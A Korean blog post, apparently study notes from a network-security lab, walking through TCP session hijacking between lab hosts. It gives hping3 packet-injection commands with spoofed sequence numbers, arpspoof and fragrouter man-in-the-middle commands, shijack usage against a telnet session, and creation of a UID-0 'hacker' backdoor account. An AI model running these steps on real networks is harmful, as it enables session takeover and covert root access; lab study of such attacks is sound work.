kjh00n의 기록저장소
TCP Session Hijacking 실습 본문
Server (Rocky) - 192.168.50.50
Client (Rocky) - 192.168.50.100
Kali Linux - 192.168.50.200
Server
nc -l 9000 (9000번 Port를 열겠다)
Client
nc 192.168.50.50 9000
Client에서 hello를 입력하면 Server쪽에도 자동으로 출력되고 Server에서 hello라고 입력하면 Client도 출력된다.
hping3 -a <출발지 IP> -s <출발 포트> -p <목적지 포트> -M <Sequence 번호> -L <Acknowledgment 번호> -E <파일 경로> -d <전송할 파일 크기> -P -A -c <전송 횟수> <목적지 IP>
Kali Linux
파일 하나 만들어주기
(다시 새로 접속해서 Port랑 번호들이 다 바뀜)
hping3 -a 192.168.50.100 -s 57396 -p 9000 -M 3472942298 -L 2540105380 -E /root/data.txt -d 10 -P -A -c 1 192.168.50.50
Kali Linux가 TCP Session Hijacking을 했기에 Server와 Client는 연결이 끊긴 상태임
그래서 Kali Linux에 있는 data.txt의 내용인 hello1이 Server에 출력되고 Client에서 아무리 데이터를 입력해도 Server에는 전달되지 않음
TCP Session Hijacking이 된 상태
Client와 Server가 연결이 안되서 다시 보내달라고 계속 요청중
Tool을 사용한 공격
바탕화면인 Desktop으로 이동하고 압축을 풀어준다.
그러고 나서 압축을 풀고나서 나온 폴더로 이동
./shijack-lnx eth0 192.168.50.100 49960 192.168.50.50 23
49960은 client인 50.100의 port주소
23은 telnet server의 port주소
[해커인 50.200이 50.100인척 속여서 50.50을 접속하겠다~]
당연히 Client는 연결이 끊겼기에 아무런 입력도 불가능
계정을 hacker라는 계정을 만들고 hacker의 UID를 0으로 강제로 바꾼다
-o가 강제로 바꾼다는 뜻 / 0은 root와 같은 UID이다.
만들고 종료한 다음 telnet으로 접속하기
telnet으로 192.168.50.50에 hacker라는 계정으로 접속했는데 UID가 0이라서 root로 표시된다.
Telnet Server Linux에는 hacker라는 계정이 생성되어있다.
공격 순서
1. server -> telnet-server 구축 및 실행
2. client -> telnet-client 설치
3. kali -> arpspoofing 공격
(arpspoof -i eth0 -t 192.168.50.50 192.168.50.100)
(arpspoof -i eth0 -t 192.168.50.100 192.168.50.50)
(fragrouter -B1)
4.client -> telnet 접속 및 로그인하고 원격서비스 진행
5.kali -> fragrouter 종료 -> forwarding 기능 종료
6.kali -> ./shijack-lnx eth0 192.168.50.100 client포트(fragrouter한 터미널에서 보임) 192.168.50.50 서버포트23
7.client가 명령어 입력하면 입력안됨 -> kali에서는 sequence 번호와 acknowledge 번호를 습득
8.kali가 습득한 번호와 주소를 이용하여 hijacking 성공
'네트워크 보안 운영' 카테고리의 다른 글
DNS Spoofing 실습 (0) | 2024.12.12 |
---|---|
DNS Attack (0) | 2024.12.12 |
TCP Session Hijacking (0) | 2024.12.12 |
ICMP Spoofing(ICMP Redirect) 및 간단한 실습 (0) | 2024.12.11 |
IP Spoofing 간단 실습 (0) | 2024.12.11 |